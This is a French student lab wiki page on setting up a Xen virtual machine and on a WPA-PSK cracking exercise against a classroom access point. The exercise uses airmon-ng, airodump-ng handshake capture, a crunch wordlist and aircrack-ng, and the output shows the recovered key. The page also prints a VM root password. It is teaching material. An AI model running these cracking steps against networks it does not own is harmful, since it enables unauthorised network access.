TP sysres IMA2a5 2019/2020 G1

De Wiki d'activités IMA

Maxime Hirt - Fabien Cavalier

Présentation du Groupe et du projet

Le groupe de projet est contitué de Cavalier Fabien et Hirt Maxime.

Lors de ce projet nous allons devoir:

  • Créer une architecture reseaux avec un système de redondance
  • Créer une machine virtuel
  • Parametrer des connections IPV6
  • Effectuer un forcebrut sur une clé WEP et WPA
  • Créer un systeme de stockage Raid5
  • Cryptage de fichiers

Installation de la machine virtuelle avec xen

Connection à Corduan via ssh

ssh root@cordouan.insecserv.deule.net

Création et initialisation de la machine virtuelle

Creation de la machine virtuelle

xen-create-image --hostname=ima2a5-zerofun --dhcp --dir=/usr/local/xen --dist=ascii --apt-proxy=http://proxy.polytech-lille.fr:3128


xl create ima2a5-zerofun.cfg

Modification du fichier de configuration de la VM

nano ima2a5-zerofun.cfg
 #
 # Configuration file for the Xen instance ima2a5-zerofun, created
 # by xen-tools 4.7 on Fri Nov  8 08:57:54 2019.
 #
 
 #
 #  Kernel + memory size
 #
 kernel      = '/boot/vmlinuz-4.9.0-6-amd64'
 extra       = 'elevator=noop'
 ramdisk     = '/boot/initrd.img-4.9.0-6-amd64'
 
 vcpus       = '1'
 memory      = '256'
 
 
 #
 #  Disk device(s).
 #
 root        = '/dev/xvda2 ro'
 disk        = [
 'file:/usr/local/xen/domains/ima2a5-zerofun/disk.img,xvda2,w',
 'file:/usr/local/xen/domains/ima2a5-zerofun/swap.img,xvda1,w',
 ]
 
 
 #
 #  Physical volumes
 #
 
 
 #
 #  Hostname
 #
 name        = 'ima2a5-zerofun'
 
 #
 #  Networking
 #
 dhcp        = 'dhcp'
 vif         = [ 'mac=00:16:3E:92:4D:4E, bridge=IMA2a5' ]
 
 #
 #  Behaviour
 #
 on_poweroff = 'destroy'
 on_reboot   = 'restart'
 on_crash    = 'restart'
 
 

Lancement de la VM

xl console ima2a5-zerofun

Connexion ssh@193.48.57.161

Récupération du mot de passe

cat /var/log/xen-tools/ima2a5-zerofun.log | grep Password
>>Root Password   :  a7a5eajZ5uCpXrZXWQ9esTT

On peut ensuite modifier le mot de passe avec passwd

Brut force Wifi

Configuration de la machine virtuelle pour que var et home soient des partitions de l'hôte

   lvcreate -L10G -n ima2a5-zerofun-home virtual
   lvcreate -L10G -n ima2a5-zerofun-var virtual
   mke2fs /dev/virtual/ima2a5-zerofun-home
   mke2fs /dev/virtual/ima2a5-zerofun-var


Modification du fichier de config

   disk    	= [
                 	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',
                 	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               
                      'phy:/dev/virtual/ima2a5-zerofun-home,xvdb1,w',
                      'phy:/dev/virtual/ima2a5-zerofun-var,xvdb2,w',
                ]

Site web

Brut force Wifi

Stockage Raid5

Cryptage de fichiers

Tests d'intrusion

Le package aircrack-ng était déjà installé, pas besoin de le refaire.

5.2 Cassage de clef WEP d’un point d’accès Wifi

Passage de la carte wifi en mode moniteur

airmon-ng 
>> phy0 wlx40a5ef0f679b rt2800usb Ralink Technology, Corp. RT5370
airmon-ng start wlx40a5ef0f679b

Ecoute des trames Wifi sur le canal 2

airodump-ng -c 2 wlx40a5ef0f679b

Récupération des datas échangées sur le réseau Wifi

airodump-ng


Craquage WPA-PSK D'abord on va lister les interfaces WiFi de notre machine avec la commande

airmon-ng 
PHY	Interface	Driver		Chipset
phy0	wlx40a5ef0590b2	rt2800usb       Ralink Technology, Corp. RT5370 


Ensuite on va lancer le "monitor mode" pour dédier l'interface à Aircrack

airmon-ng start wlx40a5ef0590b2 

Le pc va renommer l'interface par un nom standard qu'il réutilisera pour d'autres commandes. Si on re-check les interfaces, on a maintenant :

PHY	Interface	Driver		Chipset
phy0	wlan0mon	rt2800usb       Ralink Technology, Corp. RT5370 


Ensuite on récupère l'adresse MAC du point d'accès avec :

airodum-ng --encrypt wpa wlan0mon

On prend le BSSID de notre kracotte01 => 04:DA:D2:9C:50:58

Puis on récupère le handshake qui correspond au moment où le kracotte veut entreprendre la communication avec le routeur

airodump-ng -w -handshake -c 2 --bssid 04:DA:D2:9C:50:58 wlan0mon

Une fois le handshake récupéré, on va créer un dictionnaire contenant les caractères que l'on pense être contenus dans la clé WPA et avec le nombre minimal et maximal de caractères ( 8 et 8, dans notre cas) On utilise crunch :

crunch 8 8 0123456789 >> Dico_fc.txt

Ensuite on lance la commande qui va comparer le handshake et le dictionnaire :

root@zabeth14:/home/pifou/Desktop/craquage WPA# aircrack-ng handshake-02.cap -w Dico_fc.txt

Puis on laisse tourner jusqu'à ce qu'il trouve la clé. (Bonne soirée...)

Opening handshake-02.cap
Read 242831 packets.
  #  BSSID              ESSID                     Encryption
  1  04:DA:D2:9C:50:58  kracotte01                WPA (1 handshake)
Choosing first network as target.
Opening handshake-02.cap
Reading packets, please wait...
                                Aircrack-ng 1.2 rc4
     [00:21:23] 10222228/102795810 keys tested (8175.38 k/s) 
     Time left: 3 hours, 8 minutes, 43 seconds                  9.94%
                          KEY FOUND! [ 10222222 ]
     Master Key     : FB F0 0D 55 85 CC 0D A6 9B AA 68 CE 90 3D D2 84 
                      02 AD A6 12 3D 35 8A 2D 67 58 CF 0A 1B 99 30 B0 
     Transient Key  : C9 A5 CD E3 86 CC 6E B9 72 FE 47 B6 12 29 75 95 
                      70 B3 7E 31 05 0F C0 F5 53 92 7C 97 07 81 9D 90 
                      09 F2 0B 66 4C 6D 58 35 5E CC E2 5A 2A 25 D2 66 
                      18 36 5D 9D 57 30 A5 72 AA 89 55 1E 27 84 D1 3A 
     EAPOL HMAC     : 2A 02 78 56 B1 DC 14 02 D1 27 54 6E 3D 0C 71 7E